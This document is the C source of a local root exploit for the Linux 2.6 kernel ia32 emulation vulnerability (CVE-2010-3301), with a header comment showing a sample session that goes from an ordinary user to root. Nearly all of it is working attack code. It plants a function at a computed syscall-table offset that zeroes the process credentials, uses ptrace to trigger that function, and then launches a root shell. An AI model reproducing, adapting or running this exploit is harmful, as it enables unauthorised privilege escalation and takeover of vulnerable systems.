bash

1. /* Linux Kernel 2.6.x local root exploit (x86_64) ia32entry emulation
2.    ==================================================================
3.    Exploit for the rediscovered ia32 emulation vulnerability regression
4.    introduced into the Linux kernel 2.6 branch. This exploit gives a
5.    root shell, tested against Ubuntu 64bit - sometimes have to run more
6.    than once. Change the syscall_table value to match your kernel. Most
7.    of this adapted from public code for old 2007 exploit. CVE-2010-3301.
8.  
9.  Ex.
10.    fantastic@ubuntu:~$ uname -a
11.    Linux ubuntu 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:38:40 UTC 2010 x86_64 GNU/Linux
12.    fantastic@ubuntu:~$ id
13.    uid=1000(fantastic) gid=1000(fantastic) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1
14.    (fantastic)
15.    fantastic@ubuntu:~$ ./x
16.    # id
17.    uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(fantastic)
18.    #
19.  
20.   -- prdelka
21. */
22. #include <sys/ptrace.h>
23. #include <sys/user.h>
24. #include <sys/types.h>
25. #include <sys/wait.h>
26. #include <unistd.h>
27. #include <stdio.h>
28. #include <sys/mman.h>
29. #include <string.h>
30. #include <stdlib.h>
31. #include <stddef.h>
32. #include <stdint.h>
33.  
34. // ia32_sys_call_table address (/proc/kallsyms)
35. #define syscall_table 0xffffffff810375d0
36. #define offset        (1L << 32)
37. #define landing       (syscall_table + 8*offset)
38.  
39. unsigned short uid, gid;
40. unsigned long task_struct1;
41. unsigned long sp;
42.  
43. void kernelmodecode() {
44.     asm volatile ("movq %%rsp,%0; " : "=r" (sp));
45.     task_struct1 = sp & ~(8192 - 1);
46.     unsigned int *task_struct;
47.     task_struct = (unsigned int *)task_struct1;
48.     while (task_struct) {
49.         if (task_struct[0] == uid && task_struct[1] == uid &&
50.                 task_struct[2] == uid && task_struct[3] == uid &&
51.                 task_struct[4] == gid && task_struct[5] == gid &&
52.                 task_struct[6] == gid && task_struct[7] == gid) {
53.             task_struct[0] = task_struct[1] =
54.             task_struct[2] = task_struct[3] =
55.             task_struct[4] = task_struct[5] =
56.             task_struct[6] = task_struct[7] = 0;
57.             break;
58.         }
59.         task_struct++;
60.     }
61.     return;
62. }
63.  
64. int main() {
65.     uid = getuid();
66.     gid = getgid();
67.         if((signed long)mmap((void*)(landing&~0xFFF), 4096,
68.                               PROT_READ|PROT_EXEC|PROT_WRITE,
69.                               MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
70.                                 0, 0) < 0) {
71.                 perror("mmap");
72.                 exit(-1);
73.         }
74.         *(long*)landing = (uint64_t)kernelmodecode;
75.     pid_t child;
76.         child = fork();
77.         if(child == 0) {
78.                 ptrace(PTRACE_TRACEME, 0, NULL, NULL);
79.                 kill(getpid(), SIGSTOP);
80.                 __asm__("int $0x80\n");
81.         setuid(0);
82.         setgid(0);
83.                 execl("/bin/sh", "/bin/sh", NULL);
84.         } else {
85.                 wait(NULL);
86.                 ptrace(PTRACE_SYSCALL, child, NULL, NULL);
87.                 wait(NULL);
88.                 ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
89.                         (void*)offset);
90.                 ptrace(PTRACE_DETACH, child, NULL, NULL);
91.                 wait(NULL);
92.         }
93. }